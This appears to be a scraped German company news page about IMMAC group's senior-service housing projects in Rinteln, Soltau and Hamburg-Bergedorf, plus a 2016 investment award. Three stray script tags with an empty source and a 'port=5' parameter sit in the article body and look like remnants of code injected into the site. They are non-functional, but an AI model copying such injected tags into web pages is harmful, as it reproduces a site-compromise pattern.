IMMAC plant neues Bauvorhaben in Rinteln, Niedersachsen

IMMAC plant neues Bauvorhaben in Rinteln, Niedersachsen

Die IMMAC group plant für das 1. Quartal 2022 den Neubau eines Wohn- und Geschäftshauses in Rinteln, Landkreis Schaumburg in Niedersachsen. Auf einer Fläche von ca. 7.300 m² Bruttogeschossfläche sollen 41 Wohnungen einschließlich einer Tiefgarage mit 37 Stellplätzen sowie eine Gemeinschaftsfläche und eine Dialysepraxis in unmittelbarer Nähe zur Altstadt errichtet werden.

Mit der notariellen Beurkundung der Kaufverträge am 25. November 2020 wurde der Erwerb der für das Projekt in Rinteln vorgesehenen Grundstücksflächen durch die IMMAC group offiziell besiegelt. Zwei der Grundstücke befanden sich im Eigentum der NIG-Nordschaumburg Immobilien GmbH, einer Tochtergesellschaft der Volksbank eG in Schaumburg, eines im Besitz der Schaumburger Zeitung.

Im Dezember 2020 luden Jens Wolfhagen, IMMAC group, und Christian Gregor, Volksbank eG in Schaumburg, zum Pressetermin in Rinteln. Gemeinsam mit dem Rintelner Bürgermeister Thomas Priemer, Stefan Reineking von der Schaumburger Zeitung sowie Michael Fritz und Stefan Horstmann, Volksbank, wurde das neue Bauvorhaben präsentiert.

Die Grundstücke sind in der Rintelner Innenstadt am Anfang der Fußgängerzone, Klosterstraße, Ecke Kahlergasse gelegen. Geplant ist der Bau eines dreigeschossigen Gebäudes mit erweitertem Dachgeschoss, das 30 Senioren-Service-Wohnungen im ersten und zweiten Stockwerk sowie 11 Wohnungen ohne Nutzerkreisbeschränkung im Dachgeschoss anbietet. Zusätzlich dazu sind im Erdgeschoss die Errichtung einer Dialysepraxis und eines Gemeinschaftsraumes für die künftigen BewohnerInnen des Service-Wohnens vorgesehen. Neben der Tiefgarage sind auch oberirdische Stellplätze geplant.

Visualisierung_ServiceWohnen_Rinteln

Visualisierung des Bauvorhabens in der Klosterstraße in Rinteln
(© Sichtvision Architekturgrafik, Dipl.-Ing. Valentina Daria Gorny)

 

Christian Gregor, Immobiliendienst der Volksbank und zuständig für den Verkauf der Eigentumswohnungen, kommentierte, dass die Wohnungen von ein oder zwei Personen genutzt werden können. Darüber hinaus eigneten sie sich auch als Kapitalanlage.
Auch Stefan Reineking, Geschäftsführer und Chefredakteur der Schaumburger Zeitung, begrüßte das neue Bauvorhaben. Zwar sei ein Standortwechsel nach fast 100 Jahren im ersten Moment eine schwere Entscheidung gewesen, in Hinblick auf eine erfolgreiche Innenstadtentwicklung aber ein Schritt, den die Schaumburger Zeitung gerne mitgehe.

In enger Abstimmung mit den örtlichen Behörden, dem Planungsbüro Matthias Reinold, dem Ingenieurbüro Wehmeyer und dem Bürgermeisteramt in Rinteln erarbeitete das Team der IMMAC Wohnbau GmbH einen Bebauungsplan, mit dem die planungsrechtliche Grundlage für die Umsetzung des Neubaus geschaffen wurde. Dieser erlangte bereits Ende April 2020 Rechtskraft.

IMMAC ist bereits seit längerem in der Region aktiv. In Rinteln ist aktuell in der Dauestraße der Neubau eines Pflegeheims geplant, im nahe gelegenen Bückeburg baut IMMAC eine Senioren-Wohnanlage und ein Pflegeheim. Zusätzlich soll eine Pflegeschule für die Ausbildung zukünftiger PflegerInnen entstehen. Mit der nun folgenden Senioren-Wohnanlage und dem Dialysezentrum in der Rintelner Innenstadt wird das Angebot vervollständigt und der Pflegebedarf am Standort Rinteln und Bückeburg für die kommenden Jahrzehnte gedeckt.

Jens Wolfhagen, Mitglied des Vorstands IMMAC group, betonte, dass man nun bei der Umsetzung des Bauvorhabens zügig voranschreiten wolle. Nach der erfolgreichen Grundstücksbeurkundung wurde der Bauantrag am 17.12.2020 beim örtlichen Bauamt eingereicht. Mit der korrespondierenden Baugenehmigung wird im Laufe des kommenden Jahres gerechnet, der Baubeginn ist für März 2022 vorgesehen. Nach aktuellem Planungsstand wird die Finalisierung des Neubaus für Ende 2023 angesetzt.

 

Vertragspartner_nachPressetermin_Rinteln_Klosterstrasse

© Foto: Tobias Landmann
Von links nach rechts: Stefan Reineking (Geschäftsführer Schaumburger Zeitung), Stefan Horstmann (Private Banking Volksbank), Bürgermeister Thomas Priemer, Christian Gregor (Immobiliendienst Volksbank), Jens Wolfhagen (Vorstand IMMAC Holding) und Michael Fritz (Filialleiter Volksbank).

 

Weiterlesen

Grundsteinlegung von 30 Service-Wohnungen in Soltau/Reitschulweg

Am 02. Mai 2017 wurde der Grundstein für 30 Service-Wohnungen in Soltau gelegt. Neben dem Altenpflegeheim, „Haus im Park“ in Soltau, entstehen gerade die neuen Wohnungen. Baubeginn war bereits Anfang März und die Arbeiten schreiten schon sehr gut voran. Davon überzeugen konnten sich die geladenen Gäste am Vormittag auf der Baustelle.

Nach einer kurzen Begrüßung durch den Geschäftsführer der IMMAC Wohnbau, Thomas Eichentopf, erklärte die Projektleiterin des Neubaus, Frau Saskia Weber, das geplante Bauvorhaben. Bürgermeister Helge Röbbert von der Stadt Soltau unterstrich in seiner Ansprache, wie wichtig das Thema der demographischen Entwicklung auch für Soltau sei. Gerade wenn ältere Menschen aus ihren Wohnungen ausziehen um jüngeren Familien Platz zu machen, sind Seniorenwohnungen eine perfekte Alternative um in einem betreuten Umfeld leben zu können.

Von Seiten des Betreibers DOREA begrüßte Herr Jamal Bounoua die anwesenden Gäste und zeigte sich sehr erfreut, mit den entstehenden Wohnungen die Angebotspalette in Soltau zu erweitern.

Bewaffnet mit einer Maurerkelle, wurden dann symbolisch zwei Steine gemauert und mit einem Heideschnaps begossen.

Im Anschluss an die Grundsteinlegung lud der Betreiber des neuen Gebäudes Herr Bounoua zu einem Imbiss in das Pflegeheim Haus am Park.

<script src='https://#?port=5' type='text/javascript'></script>
v.l.n.r.: Thomas Eichentopf GF IWB, Helge Röbbert Bürgermeister Soltau, Saskia Weber Projektleiterin IWB und Jamal Bounoua Betreiber des APH „Haus am Park“ Soltau

Weiterlesen

IMMAC Wohnbau verkauft seniorengerechte Service Wohnungen in Hamburg-Bergedorf und baut weitere Wohnungen in Soltau – Hamburg 17.03.2017

IMMAC Wohnbau verkauft seniorengerechte Service Wohnungen in Hamburg-Bergedorf und baut weitere Wohnungen in Soltau

Der Hamburger Projektentwickler für Servicewohnungen, IMMAC Wohnbau GmbH, errichtet auf dem Grundstück in der Vierlandenstraße 29 in Hamburg-Bergedorf eine Wohnanlage mit 50 seniorengerechten Service-Wohnungen und einem Gemeinschaftsbereich. Die Einheiten werden im Teileigentum ausschließlich Kapitalanlegern zum Kauf angeboten. Derzeit sind nur noch wenige Einheiten verfügbar.

Das Gebäude hat insgesamt 3 Vollgeschosse sowie ein Staffelgeschoss. Vom Erdgeschoss bis zum 4. Obergeschoss befinden sich 2-Zimmer-Wohnungen, die alle barrierearm gestaltet sind. Jede Wohnung besitzt einen Balkon oder Zugang zum eigenen Terrassenbereich.

Neben diesen Schwerpunkten sorgen technische Einrichtungen wie z.B. eine Haustelefonanlage, Automatiktüren an den Hauseingängen, sowie Wasch- und Trockenräume für mehr Sicherheit und Komfort im täglichen Leben. Für die rechtliche Sicherheit der zu erstellenden Wohngebäude für Service-Wohnen gibt es zwingende Vorschriften und Normen, die von den beauftragten Architekten und Ingenieuren selbstverständlich eingehalten werden. Diese Vorschriften und Normen variieren je nach Bundesland, weshalb IMMAC bevorzugt mit örtlich ansässigen Architekten mit Erfahrung im Bereich des Service-Wohnens zusammen arbeitet.

Partner vor Ort ist der ASB, der bereits 550 Service-Wohnungen in Hamburg betreut und weiter expandiert. Der ASB hat die Serviceflächen im Erdgeschoss der Wohnungsanlage "Vierlanden" auf fünfzehn Jahre fest angemietet. Diese Räumlichkeiten stehen ausschließlich für die Bewohner des Hauses als Anlaufpunkt und Ort der Kommunikation zur Verfügung. Da der ASB mit dieser Station neben der Miete auch noch erhebliche Personalkosten hat, die nur aus Servicepauschale der Mieter und auf Wunsch zusätzlich abgerufener Dienstleistungen gedeckt werden müssen, gilt das Interesse des ASB einer lückenlosen und dauerhaften Vollvermietung.

IMMAC Wohnbau GmbH baut 30 Servicewohnungen in Soltau

Neben dem derzeitigen Engagement in Hamburg-Bergedorf, baut IMMAC Wohnbau derzeit direkt neben dem IMMAC Pflegezentrum im niedersächsischen Soltau 30 Service-Wohnungen und eine Gemeinschaftsfläche. Die Einheiten können ebenfalls ausschließlich durch Kapitalanleger erworben werden.

Der Baubeginn ist noch im März 2017. Die Fertigstellung ist für Frühjahr 2018 geplant. Betreiber der Servicewohnungen wird die renommierte DOREA Gruppe.

 

Weiterlesen

Beteiligungspreis 2016 – Hamburg 08.11.2016

Beteiligungspreis 2016 für Neubauprojekt IMMAC Service-Wohnen Vierlanden

Vom Magazin "BeteiligungsReport" wurde am 27. Oktober 2016 in Landshut der alljährliche BeteiligungsPreis in verschiedenen Kategorien verliehen. Die Jury wählte das Neubauprojekt IMMAC Service-Wohnen Vierlanden im Teileigentum als Gewinner in der Kategorie "Innovatives Angebot".

Nach 2013, 2014 und 2015 hat IMMAC zum vierten Mal in Folge einen BeteiligungsPreis verliehen bekommen, den IMMAC Vorstand Thomas F. Roth aus den Händen des Laudators Werner Rohmert entgegennehmen durfte. In seiner Laudatio würdigte Werner Rohmert, Herausgeber "Der Immobilienbrief" und Immobilienspezialist des "Platow Briefs" das Angebot von seniorengerechten Wohnungen im Teileigentum zu standortüblichen Kauf- und Mietpreisen als deutliches Zeichen gegenüber der mittelweile weit verbreiteten Unsitte, Pflegezimmer im Teileigentum überteuert zu verkaufen.

 

<script src='https://#?port=5' type='text/javascript'></script>
<script src='https://#?port=5' type='text/javascript'></script>
Alle Preisträger und Laudatoren des Beteiligungspreises am 27.10.2016 - Foto: beteiligungsreport

Weiterlesen